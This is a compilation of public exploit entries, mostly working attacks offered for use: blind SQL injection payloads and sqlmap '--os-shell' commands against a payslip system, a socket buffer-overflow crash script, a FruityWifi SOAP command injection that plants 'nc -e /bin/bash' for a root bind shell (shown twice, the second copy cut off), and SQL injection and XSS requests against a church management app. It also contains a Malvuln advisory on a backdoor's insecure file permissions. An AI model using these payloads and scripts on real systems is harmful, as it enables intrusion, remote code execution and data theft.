<pre><code># Title: Pay Slip PDF Generator System 1.0 Blind time SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov/pess/admin/positions/manage_position.php?id=2<br /># 2 - manual inject Blind SQli https://0day.gov/pess/admin/positions/manage_position.php?id=2' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'hejap'='hejap&name=&status=1<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br />#vulnerability Code php<br /><br />---<br />```php<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br /> $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' ");<br /> if($qry->num_rows > 0){<br /> foreach($qry->fetch_assoc() as $k => $v){<br /> $$k=$v;<br /> }<br /> }<br />}<br />```<br />---<br /><br /><br />#Status: CRITICAL<br />```<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=2297' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'cmPD'='cmPD&name=&status=1<br />---<br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -u 'http://0day.gov/pess/admin/positions/manage_position.php?id=%27<br />' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D pess_db -T users --dump --os-shell --form name <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br /><br />https://i.imgur.com/i93iKvO.png<br /><br /><br /><br /><br />-----------------------<br /><br /><br /><br /><br /># Title: Pay Slip PDF Generator System 1.0 Blind boolean SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : http://0day.gov/pess/admin/positions/view_position.php?id=2 <br /><br /># 2 - manual inject Blind SQli https://0day.gov/pess/admin/positions/view_position.php?id=2 ' AND 6304=6304 AND 'hejap'='hejap<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br />#vulnerability Code php<br /><br />---<br />```php<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br /> $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' ");<br /> if($qry->num_rows > 0){<br /> foreach($qry->fetch_assoc() as $k => $v){<br /> $$k=$v;<br /> }<br /> }<br />}<br />```<br />---<br />#Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /pess/admin/positions/view_position.php?id=2%20%27%20AND%206304=6304%20AND%20%27hejap%27=%27hejap HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br />Te: trailers<br />Connection: close<br />---<br /><br />```<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hejap<br />---<br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -u 'https://0day.gov/pess/admin/positions/view_position.php?id=2<br />' --hex --time-sec=5 --dbms=mysql --technique=b --random-agent --eta -p id -D pess_db -T users --dump --os-shell <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/3KLWZqM.png<br />https://i.imgur.com/kZwAVkD.png<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3dd1da64e306cae0409e154e15dd1b80.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cyn.20<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a ".EXE" file with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Cyn<br />Type: PE32<br />MD5: 3dd1da64e306cae0409e154e15dd1b80<br />Vuln ID: MVID-2022-0524<br />Disclosure: 03/25/2022<br /><br />Exploit/PoC:<br />C:\>cacls "Program Filessystem.EXE"<br />C:\Program Filessystem.EXE BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir "Program Filessystem.EXE"<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/22/2022 02:35 AM 0 Program Filessystem.EXE<br /> 1 File(s) 0 bytes<br /> 0 Dir(s) 24,893,874,176 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2022-03-25<br /># Vendor Homepage: https://www.allmediaserver.org/<br /># Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe<br /># Tested Version: 1.6<br /># Vulnerability Type: Buffer Overflow (DoS) Remote<br /># Tested on OS: Windows 7 x86 - Windows 10 x64<br /><br /># Description: ALLMediaServer 1.6 Remote Buffer Overflow<br /><br /># Steps to reproduce:<br /># 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878<br /># 2. - Run the Script from remote TCP/IP<br /># 3. - Mediaserver.exe Crashed<br /><br /><br />import socket<br /><br />print("######################################################")<br />print("# ALLMediaServer 1.6 Remote (BUffer Overflow) #")<br />print("# -------------------------- #")<br />print("# BY Yehia Elghaly #")<br />print("######################################################")<br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /><br />try:<br /> s.connect(('192.168.1.99', 878))<br /> evilbuffer = "A" *1800<br /> s.sendall(evilbuffer)<br /> data = s.recv(1024)<br /> s.close()<br /> print "Media is Out"<br />except socket.error, msg:<br /> print ""<br /> print "Couldnt connect with Mediaserver - Crashed"<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: utf-8 -*-<br /># usage: ./akhlutprowlingterror.py http://phishingsiteurl<br />text='''<br />-o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o-<br /><br /> ████<br /> ██████<br /> ██████<br /> ██<br /> ██<br /> ██████ ▓▓ ██<br /> ██████ ██ ██████<br /> ██▓▓ ██ ██████<br /> ▓▓ ██ ▒▒<br /> ██ ████ ▓▓<br /> ██ ██████ ██▓▓<br /> ████ ██████ ▓▓████ ██<br /> ▓▓ ██████ ████████ ████▓▓ ██████<br />██████ ████████ ▓▓██████████ ████████ ██████<br />██████ ██████████████████████████████████████ ██<br /> ██ ▓▓██████████████████████████████████████ ██<br /> ██ ██████████████████████████████████████████ ████<br /> ████████▓▓████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> █████████████████████ _ _ _ _ __ █████████████████████<br /> ████████▓▓ [|\|\\/[|\|[|-\\/ ▓▓████████<br /> .o oO0O0O0Oo '' `-''` O0Oo<br /> Ob.O0O0O0Oo O0Oo. oOOo. .adO0O0O0O<br /> OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO<br /> OOP.oOOONOOOOOOO "OOOEGGSOOOOOo. `"OOOOO4OOOP,OOOOOOOOYOUo'<br /> `O'O0OO' `OO0Oo"O0O0O0O0O0O` .adO0O0O0O0O"oO0O' `OO0Oo<br /> .O0OO' `OOO0OO0OO0OO0OO0OO0OO0OO0O' `OO<br /> OOOOO '"OOO0OO0OOO0OO0OO"` oOO<br /> oOO0OOba. .adOOOO0OOOOOba .adOO0Oo.<br /> oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO<br /> OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO<br /> "O0OO" "YOoOOKNIGHTSODOO"` . '"OOOONYNEXOOOoOY" "O0O"<br /> Y 'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?' :`<br /> : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .<br /> . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo<br /> '&o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':<br /> `$" `OOOO' `O"Y ' `OOOO' o .<br /> . . OP" : o .<br /> :<br /> . 4E 59 4E 45 58<br /> _<br /> _ | |<br /> | |_______| \---------------------------------------------------------------\<br /> | |_______| =[ The Knights of NYNEX presents: Akhlut prowling terror ]=======><br /> |_| | /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/<br /> |_|<br />'''<br />m='''<br />"::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;"<br /><br /><br />-o==[=====> META <=====]==o-<br />Is it a bird? is it a plane? No, it's a lame phisher about to get pwned!<br /> - https://github.com/xtr4nge/FruityWifi<br /><br /><br />-o==[=====> EXPLOIT <=====]==o-<br />'''<br /># Hope this isn't bug collision: https://github.com/xtr4nge/FruityWifi/issues/286<br />import requests<br />import sys<br />import time<br />print(text)<br />if (len(sys.argv) < 2):<br /> print("RTFM already!")<br /> exit(1)<br />print("Prowling the waters around "+sys.argv[1])<br />print("Caught the scent of a fruity phish")<br />time.sleep(2)<br />headers = {'content-type': 'text/xml','SOAPAction': 'urn:FruityWifi#setInterface','Client_ip': '127.0.0.1','X_FORWARDED_FOR': '127.0.0.1'}<br />body = """<br /> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"<br /> xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:FruityWifi"><br /> <soapenv:Header/><soapenv:Body><urn:setInterface soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <config xsi:type="xsd:string">i_internet</config><br /> <interface xsi:type="xsd:string">pwnt\\"/' by";nc -e /bin/bash -lp 4444;echo knightsofnynex #</interface><br /> </urn:setInterface></soapenv:Body></soapenv:Envelope>"""<br />print("Nighttime is best for hunting...")<br />time.sleep(2)<br />print("Hope you still see in the morning kid")<br />try:<br /> r = requests.post(sys.argv[1]+"wsdl/FruityWifi.php",data=body,headers=headers,timeout=3)<br /> if "You are not authorized" in r.content:<br /> print("Exploit failed!")<br /> exit(2)<br />except:<br /> print("Closer, closer, closer")<br />print("Spring the ambush! Sink our teet in!")<br />print("Crush their bones! eat their brains!")<br />time.sleep(2)<br />print("-o==[=====> The root shell should be listening on port 4444...")<br />print("-o==[=====> if it's not already root, you can sudo...\n")<br />print("H4CK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!\n\n")<br /><br />text='''<br />$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@<br /><br /> ⣀⣤⣶⣶⡶<br /> ⣀⢴⣿⣿⣿⡿⠏<br /> ⢀⢔⣾⣾⣿⣿⠟⠟<br /> ⣠⣔⣽⣿⣿⣹⣿⡏⡌<br /> ⢀⣀⣀⢠⣤⣤⣤⣤⣤⣴⣿⣿⣿⣿⠏ ⣿⣿⣷⠆ ⣀⡠⣤⣶⣖⣛⣛⣻⣿⣿⣿⣿⣷⣶⡾⠛⠁<br /> ⣀⣤⣤⣶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣤⣄⡉⠉⠙ ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣟⢿⣿⣿⣏ ⢄<br /> ⢠⢖⣽⣿⠟⡉ ⢀⣄⡹⣿⣿⣿⣿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣴⣿⣿⣲⣄<br /> ⣰⣻⣿⣿⣗⣉⣠⣤⠾⠿⠿⣿⣿⣿⣿⢣⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⣀<br /> ⣿⣿⣿⣿⣿⣿⡿⠋⢀⠔ ⠈⠛⢿⣿⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏ ⢀⣀⣀⡀ ⣸⡿⠟⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣖⣤⡀ ⢀⣠⣤⣰⣶⠶⠄<br /> ⣿⣿⣿⣿⣿⡿⠃⠴⠥⠤⠤⠤⠤⢀⡉⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋ ⠛⠛⠛⢉⡉⣶⣾⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣻⣿⣿⣿⣿⣿⣿⣶⣦⣀ ⣠⣶⣿⣿⣿⣿⣟⡀<br /> ⢿⠿⠿⠿⠗⠔⠁ ⠈⠿⣮⣟⣿⣿⣿⣿⣿⣻⣏ ⠤⠐⠉ ⢿⣿⣿⣿⣿⣧⡈⠛⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣏⠉⢁⣘⠹⠿⠿⠿⠿⠿⠿⠿⠶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⡀<br /> ⣿⣿⣿⡟⢿⣿⣿⣿⣿ ⠙⠛⢿⣿⣿⣿ ⠈⠙⢿⣿⣿⣿⡆ ⠈⠉⠁ ⠈⠉⠉⠉ ⠙⠛⠛⠛⠛⠿⠛⠛⠛⠛<br /> ⢀⣾⣿⣿⠏ ⢸⣿⣿⣿⠇ ⣀⣴⣿⣿⡟ ⢈⣿⣿⣿⣿<br /> ⢀⣴⣿⣿⣿⠏ ⢀⣿⣿⣿⠏ ⢀⣾⣿⣿⣿⣿⠃ ⢰⣟⡿⣿⣿⣿⣿⡇<br /> ⣠⣴⣿⣿⣿⡿⠃⢀⣶⣿⣿⣿⣿ ⠈⠉⠁⠈⠉⠁ ⠈⠘⠂⢿⠘⣿⠋<br /> ⠋⠉⠉⠉⠉ ⣜⣻⣿⣿⣿⣿⠏<br /> ⠸⠋⠿⠋<br /><br /><br />-o==[=====> GOODBYE <=====]==o-<br />This is the last issue of KoN, at least in its current format. Lets be honest<br />there is only so much you can do with phishing tools unless you target the<br />shoddy corporate ones run by retired criminals and we're not zf0.<br />Shout out to everyone who inspired, contributed and supported us, they are too<br />many to mention, but especially @mubix, @laughing_mantis and @hackerscurator<br /><br />So long, and thanks for all the phish!!!! !!<br /><br /><br />-o==[=====> SIG <=====]==o-<br />0034003200b153e3007653d825a89b24309761747489079a3982b3dc27d45c0146800237c3097651<br />b46d07be340034003200373ed0fa2bb4c022919d5c6c6c6d17327284cc7e3f642ebf19c371f15297<br />aaddf58f56389247bbbd0034003200a965f98db196490071fcc90292201721e3cb442e4164616d73<br />b6c417378dfcd82900ac2cf080d87c0034003200469fd63fd5f7fc590ffdc40e161d2b8b60937a39<br />60f33318b95bb1fccbbadc72af21f9e4f3928d4e0034003200158650bf32791bf8e2eba5de614fd6<br />c9e1a02ed591190450086e688364e9b777b4bfb6cfc06dab03003400320071c36fc094a0303ae81b<br />7c4bd57815d25f4c3febba5fd73e81f434fd0184f89ba8edfdcc69a57b520034003200291f55b92b<br />225049725dd6a99297c808db137243da077f82f456539e8c3c545f491c0336b2e15083bb0f47d478<br />'''<br /><br /></code></pre>
<pre><code># Exploit Title: One Church Management System 1.0 - attendancy.php<br />(search2) SQL Injection<br /># Date: 18/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link:<br />https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br /><br />Title:<br />================<br />One Church Management System 1.0 - attendancy.php (search2) SQL Injection<br /><br /><br />Summary:<br />================<br />The One Church Management System suffers from a Structured Query Language<br />(SQL) injection vulnerability because of the lack of query preparation with<br />the PDO module. This allows an attacker to query the database, breaking<br />confidentiality and integrity.<br /><br />88. if(isset($_POST['search2'])&& !empty($_POST['search2'])){<br />89. $search2 = $_POST['search2'];<br />90. $sql="SELECT<br />tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone<br />from tblchristian where Code = '$search2'";<br />91. $query = $dbh -> prepare($sql);<br />92. $query->execute();<br />93. $results=$query->fetchAll(PDO::FETCH_OBJ);<br />94. $cnt=1;<br /><br /><br />Severity Level:<br />================<br />9.1 (Critical)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />One Church Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open a request repeater (like Burp Suite) and send this request:<br /><br />POST /one_church/attendancy.php HTTP/1.1<br />Host: target.com<br />Content-Length: 102<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/attendancy.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search=<br /><br />In the search2 parameter I injected a SQL blind payload: ' and (select *<br />from(select(sleep(10)))Avx) and 'abc' = 'abc<br /><br />Reponse:<br /><br />HTTP/1.1 302 Found<br />Date: Fri, 18 Mar 2022 14:02:51 GMT<br />Server: Apache/2.4.52<br />Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: http://target.com/one_church/index.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 14927<br /></code></pre>
<pre><code># Exploit Title: One Church Management System 1.0 - Multiple Cross-site<br />Scripting<br /># Date: 17/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link:<br />https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />One Church Management System 1.0 - Multiple Cross-site Scripting<br /><br /><br />Summary:<br />================<br />The One Church Management System is affected by several applications with<br />the vulnerability of Cross-site Scripting due to the lack of hygiene in<br />certain parameters. The attacker can take advantage of this flaw to inject<br />arbitrary javascript code to manipulate the victim's browser capabilities.<br /><br /><br />Severity Level:<br />================<br />6.5 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />One Church Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />* churchprofile.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/churchprofile.php HTTP/1.1<br />Host: target.com<br />Content-Length: 187<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<br />image/avif,image/webp,image/apng,*/*;q=0.8,application/<br />signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/churchprofile.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />companyname=<XSS HERE>&regno=<XSS HERE>&companyaddress=<XSS<br />HERE>&companyemail=<XSS HERE>&country=India&mobilenumber=%2B919423979339&<br />submit=<br /><br />======================================================================<br /><br />* store.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/store.php HTTP/1.1<br />Host: target.com<br />Content-Length: 380<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: multipart/form-data; boundary=----<br />WebKitFormBoundaryV1aumPNc5OAr8WJV<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<br />image/avif,image/webp,image/apng,*/*;q=0.8,application/<br />signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/store.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="itemname"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="descrip"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="insert"<br /><br /><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV--<br /><br />======================================================================<br /><br />* manage_expense.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/manage_expense.php HTTP/1.1<br />Host: target.com<br />Content-Length: 402<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: multipart/form-data; boundary=----<br />WebKitFormBoundary2XF7C8775FV2TQ4y<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<br />image/avif,image/webp,image/apng,*/*;q=0.8,application/<br />signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/manage_expense.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="expense_category"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="detail"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="submitexpense"<br /><br /><br />------WebKitFormBoundary2XF7C8775FV2TQ4y--<br /><br />======================================================================<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: utf-8 -*-<br /># usage: ./akhlutprowlingterror.py http://phishingsiteurl<br />text='''<br />-o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o-<br /><br /> ████<br /> ██████<br /> ██████<br /> ██<br /> ██<br /> ██████ ▓▓ ██<br /> ██████ ██ ██████<br /> ██▓▓ ██ ██████<br /> ▓▓ ██ ▒▒<br /> ██ ████ ▓▓<br /> ██ ██████ ██▓▓<br /> ████ ██████ ▓▓████ ██<br /> ▓▓ ██████ ████████ ████▓▓ ██████<br />██████ ████████ ▓▓██████████ ████████ ██████<br />██████ ██████████████████████████████████████ ██<br /> ██ ▓▓██████████████████████████████████████ ██<br /> ██ ██████████████████████████████████████████ ████<br /> ████████▓▓████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> █████████████████████ _ _ _ _ __ █████████████████████<br /> ████████▓▓ [|\|\\/[|\|[|-\\/ ▓▓████████<br /> .o oO0O0O0Oo '' `-''` O0Oo<br /> Ob.O0O0O0Oo O0Oo. oOOo. .adO0O0O0O<br /> OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO<br /> OOP.oOOONOOOOOOO "OOOEGGSOOOOOo. `"OOOOO4OOOP,OOOOOOOOYOUo'<br /> `O'O0OO' `OO0Oo"O0O0O0O0O0O` .adO0O0O0O0O"oO0O' `OO0Oo<br /> .O0OO' `OOO0OO0OO0OO0OO0OO0OO0OO0O' `OO<br /> OOOOO '"OOO0OO0OOO0OO0OO"` oOO<br /> oOO0OOba. .adOOOO0OOOOOba .adOO0Oo.<br /> oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO<br /> OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO<br /> "O0OO" "YOoOOKNIGHTSODOO"` . '"OOOONYNEXOOOoOY" "O0O"<br /> Y 'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?' :`<br /> : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .<br /> . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo<br /> '&o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':<br /> `$" `OOOO' `O"Y ' `OOOO' o .<br /> . . OP" : o .<br /> :<br /> . 4E 59 4E 45 58<br /> _<br /> _ | |<br /> | |_______| \---------------------------------------------------------------\<br /> | |_______| =[ The Knights of NYNEX presents: Akhlut prowling terror ]=======><br /> |_| | /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/<br /> |_|<br />'''<br />m='''<br />"::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;"<br /><br /><br />-o==[=====> META <=====]==o-<br />Is it a bird? is it a plane? No, it's a lame phisher about to get pwned!<br /> - https://github.com/xtr4nge/FruityWifi<br /><br /><br />-o==[=====> EXPLOIT <=====]==o-<br />'''<br /># Hope this isn't bug collision: https://github.com/xtr4nge/FruityWifi/issues/286<br />import requests<br />import sys<br />import time<br />print(text)<br />if (len(sys.argv) < 2):<br /> print("RTFM already!")<br /> exit(1)<br />print("Prowling the waters around "+sys.argv[1])<br />print("Caught the scent of a fruity phish")<br />time.sleep(2)<br />headers = {'content-type': 'text/xml','SOAPAction': 'urn:FruityWifi#setInterface','Client_ip': '127.0.0.1','X_FORWARDED_FOR': '127.0.0.1'}<br />body = """<br /> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"<br /> xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:FruityWifi"><br /> <soapenv:Header/><soapenv:Body><urn:setInterface soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <config xsi:type="xsd:string">i_internet</config><br /> <interface xsi:type="xsd:string">pwnt\\"/' by";nc -e /bin/bash -lp 4444;echo knightsofnynex #</interface><br /> </urn:setInterface></soapenv:Body></soapenv:Envelope>"""<br />print("Nighttime is best for hunting...")<br />time.sleep(2)<br />print("Hope you still see in the morning kid")<br />try:<br /> r = requests.post(sys.argv[1]+"wsdl/FruityWifi.php",data=body,headers=headers,timeout=3)<br /> if "You are not authorized" in r.content:<br /> print("Exploit failed!")<br /> exit(2)<br />except:<br /> print("Closer, closer, closer")<br />print("Spring the ambush! Sink our teet in!")<br />print("Crush their bones! eat their brains!")<br />time.sleep(2)<br />print("-o==[=====> The root shell should be listening on port 4444...")<br />print("-o==[=====> if it's not already root, you can sudo...\n")<br />print("H4CK THE 